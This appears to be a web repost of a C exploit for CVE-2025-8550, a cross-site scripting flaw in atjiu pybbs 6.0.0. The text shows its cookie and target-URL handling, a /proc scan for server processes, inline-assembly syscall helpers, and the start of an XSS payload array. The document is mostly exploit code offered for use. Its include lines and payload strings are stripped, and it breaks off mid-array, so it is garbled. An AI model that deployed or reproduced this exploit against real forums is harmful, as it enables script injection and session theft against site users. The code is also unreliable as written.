August 11, 2025

atjiu pybbs 6.0.0 – Cross Site Scripting (XSS)

Author018 mins 


/*
 * Exploit Title : atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)
 * Exploit Author: Byte Reaper
 * Vendor Homepage: https://github.com/atjiu/pybbs
 * Tested on: Kali Linux
 * CVE: CVE-2025-8550
 * ------------------------------------------------------------------------------------------------------------------------------------
 */

#include 
#include 
#include 
#include 
#include 
#include "argparse.h"
#include 
#include 
#include 
#include 
#include 

#define FULL_URL 3500
#define FULL_PAYLOAD_URL 9000
#define BUFFER_SIZE  6000
int selCookie = 0;
const char *cookies = NULL;
const char *baseurl = NULL;
const char *nameFileC= NULL;
int cookiesPayload = 0;
const char *ip = NULL;
int port = 0;
int verbose = 0;

int serchServer_alt()
{
    printf("\e[0;35m============================================ [SEARCH PROCESS] ============================================\e[0m\n");

    const char *nameProcess[] =
    {
        "python",
        "apache2",
        "python3",
        "mysql",
        NULL

    };
    DIR *d = opendir("/proc");
    if (!d) return 1;
    struct dirent *entry;
    while ((entry = readdir(d)) != NULL)
    {
        if (!isdigit(entry->d_name[0])) continue;
        char cmdpath[256];
        snprintf(cmdpath, sizeof(cmdpath), "/proc/%s/comm", entry->d_name);
        FILE *f = fopen(cmdpath, "r");
        if (!f) continue;
        char comm[256];
        if (fgets(comm, sizeof(comm), f))
        {
            for (int i = 0; nameProcess[i]; i++)
            {
                if (strstr(comm, nameProcess[i]))
                {
                    printf("\e[0;34m[+] Process found: %s (PID: %s)\e[0m\n", nameProcess[i], entry->d_name);
                    closedir(d);
                    return 0;
                }
            }
        }
        fclose(f);
    }
    closedir(d);
    return 1;
    printf("\e[0;35m==========================================================================================================\e[0m\n");
}
void exitSyscall()
{
    __asm__ volatile
    (
        "mov $0x3C, %%rax\n\t"
        "xor %%rdi, %%rdi\n\t"
        "syscall\n\t"
        :
        :
        :"rax", "rdi"
    );
}

int checkLen(int len, char *buf, size_t bufcap)
{
    if (len < 0 || (size_t)len >= bufcap)
    {
        printf("\e[0;31m[-] Len is Long ! \e[0m\n");
        printf("\e[0;31m[-] Len %d\e[0m\n", len);
        exitSyscall();
        return 1;
    }
    else
    {
        printf("\e[0;34m[+] Len Is Not Long (%d).\e[0m\n",len);
        return 0;

    }
    return 0;
}
void nanoSleep(void)
{
    struct timespec ob;
    ob.tv_sec = 0;
    ob.tv_nsec = 500 * 1000 * 1000;

    __asm__ volatile
    (
    "mov $230, %%rax\n\t"
    "mov $1, %%rdi\n\t"
    "xor %%rsi, %%rsi\n\t"
    "mov %0, %%rdx\n\t"
    "xor %%r10, %%r10\n\t"
    "syscall\n\t"
    :
    : "r"(&ob)
    : "rax",
      "rdi",
      "rsi",
      "rdx",
      "r10",
      "memory"
    );
}

const char *payloads[] =
{
    "",
    "\">",
    "",
    "",
    "",
    "click",
    "XSS",
    "